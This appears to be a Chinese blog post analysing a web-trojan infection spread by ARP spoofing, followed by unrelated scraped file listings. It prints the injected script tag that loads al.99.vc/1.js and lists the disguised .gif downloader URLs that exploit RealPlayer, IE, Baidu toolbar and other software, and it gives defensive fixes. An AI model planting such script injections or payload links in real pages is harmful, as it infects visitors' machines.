al.99.vc挂马分析与解决建议
arp最近似乎有热起来啦。这几天人一多就卡,不是一般的卡,QQ上去倒是没啥问题。就是网页几乎就打不开。巨慢!!
昨晚把机子都检查啦便并且关闭网络恢复系统。早起又中。
名字不一样,其中一个是usrinit.exe,我打算用好的userinit.exe去覆盖中毒的机子。
360arp防火墙打开不时会报警。但没有ip地址只有mac。这种欺骗性的arp用360arp防火墙根本不起作用似的。
因为这个机房我就让这个机子上拉,所以肯定是其他机房也arp啦
打开qq空间已经被挂马啦。
<script src=http://al.99.vc/1.js></script> <html><head><meta http-equiv=”Content-Type” content=”text/html;charset=gb2312″ /><script>var g_Src_Domain=”u.cnc.qzone.qq.com”,g_iUin=27020287,_s_=new Date(),g_JSON=1;</script><script src=”http://u.cnc.qzone.qq.com/cgi-bin/entry_js.cgi?uin=27020287&r=cnc”></script><script src=”http://cnc.imgcache.qq.com/qzone/G4.1.js”></script><script>if (typeof G41Loaded==”undefined”) location=”http://qzone.qq.com/new_help/error.htm”</script><noscript><img src=”http://cnc.imgcache.qq.com/qzone/noscript.gif”></noscript></html>
其他的站打开都没问题。刚发现还以为是腾讯空间有问题呢。急忙让朋友liu测试下没有发现我这情况(红色部分的挂马代码)。所以认为是被其他机房机子arp啦,arp dns!!!
看看放学能不能给别的机房沟通沟通看看。解决问题。
al.99.vc/1.js
这个主要是几个“图片”文件(所谓的木马下载者)!
http://w18.vg/real.gif貌似感染real,
http://w18.vg/ms.gif 种ie7
http://w18.vg/baidu.gif
百度bar(百度搜霸)的漏洞利用?
http://w18.vg/x1.gif
http://w18.vg/lz.gif
http://w18.vg/bf.gif
病毒样本-al.99.vc
先留着样本,闲下来在分析。
忙起来啦在说吧
解决建议:
修改系统盘:C:\WINDOWS\system32\drivers\etc\host(用记事本打开)文件添加这句可以临时解决再次中这个站的木马病毒
127.0.0.1 al.99.vc
屏蔽这个网站就可以啦
。。。
http://w18.vg/real.gif貌似感染real,如果你有realone建议卸掉或者去官方下载最新的版本装上。如果你看到realone不是有错误提示说明你的realone有漏洞。
http://w18.vg/ms.gif这个貌似只有ie7才会被中上。所以建议你打上最新的ie补丁。
http://w18.vg/baidu.gif百度搜霸的漏洞利用,建议直接卸掉就可以啦。或者升级你的搜霸。
http://w18.vg/x1.gif这个已经为404页啦不清楚是什么
http://w18.vg/lz.gif利用的是glchat的漏洞是一个聊天工具
http://w18.vg/bf.gif暴风影音的漏洞利用,建议去下载新的暴风影音
如果个人机子建议打开病毒实时检测功能。
如果你有更好的建议,谢谢分享。
分享到:
相关推荐
通过上述分析,我们可以看出,《Chang et al., 2021.pdf》是一篇关于南天山地区地质隆升及其对区域气候影响的研究文章,它展示了地质学研究中定年方法的应用,构造活动与气候变迁之间的联系,以及地质历史重建在理解...
al.apk
For a description of the Random Walk with Restart (RWR) algorithm, which this module implements, see the paper by Kohler et al. at http://www.sciencedirect.com/science/article/pii/S0002929708001729.
Sybase.Modeling.NMap.M3al.dll.descriptor
《al.rar》是一个压缩文件,其中包含的"al算法程序"着重探讨了组合数学的算法与程序设计。组合数学是数学的一个分支,它研究有限集合中元素的不同组合方式,这在计算机科学,尤其是算法设计中有着广泛的应用。下面将...
Sybase.Modeling.NMap.M3al.dll
《深度学习在背景减除中的应用——以"al.zip_deeplearning"为例》 深度学习,作为现代人工智能领域的重要分支,已经在计算机视觉、自然语言处理等诸多领域展现出强大的能力。在此,我们将聚焦于一个具体的应用实例...
【mobile-al.zip】是一个压缩包文件,其内容包含CAD图(Computer-Aided Design图纸)以及一个名为LICENSE.txt的文本文件。CAD图是一种广泛应用于工程、建筑、机械设计等领域的计算机辅助设计工具,它允许设计师创建...
1720405153734_AL.zip
BAB因子复刻SAS代码Frazzini et al.(2014)构建了BAB因子。在实证检验方面,该文献分别在不同的市场中,包括美国和国际股票市场、国债市场、外汇和商品市场等数据,计算根据beta大小分成的10组和BAB因子的超额收益...
纤维素掺杂SiO_2与Al...柔性气凝胶的制备及性能表征_隋超.caj
BAB因子复刻SAS代码Frazzini et al.(2014)构建了BAB因子。在实证检验方面,该文献分别在不同的市场中,包括美国和国际股票市场、国债市场、外汇和商品市场等数据,计算根据beta大小分成的10组和BAB因子的超额收益...
uml2.m3al.configuration
Gu_et_al-2019-Journal_of_Polymer_Science_Part_B__Polymer_Physics
Chen Liang et al. Uncovering Insurance Fraud Conspiracy with Network Learning. SIGIR, 2019.Chen Liang et al. Uncovering Insurance Fraud Conspiracy with Network Learning. SIGIR, 2019.Chen Liang et al...
【软件】C++标准(美国.IDG."宝典"丛书,.[美].Al.Stevens,.Clayton.Walnum.著)
Bridson et al. 2003. Simulation of Clothing with Folds and Wrinkles 计算机动画领域中的服装模拟是非常重要的, Bridson et al. 在 2003 年提出了 Simulation of Clothing with Folds and Wrinkles 这篇论文,...
作者:Al.Anderson. 目录: Intro xxv 1 Walking on Wires: Fixing Physical Networks 1 2 Networking in the Dark: Planning Network Layouts 51 3 Into the Wire: Tools and Troubleshooting 85 4 You’ve Been ...
本项目"gaungzhaobujun_al.rar"聚焦于使用Qt、C++和OpenCV库来解决图像光照不均匀的问题,这是一个常见的图像质量问题,会影响图像的分析和识别效果。 首先,让我们了解一下Qt。Qt是一个跨平台的应用程序开发框架,...
资源分类:Python库 所属语言:Python 资源全名:rer.al.mcorevideoportlet-2.1.1.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059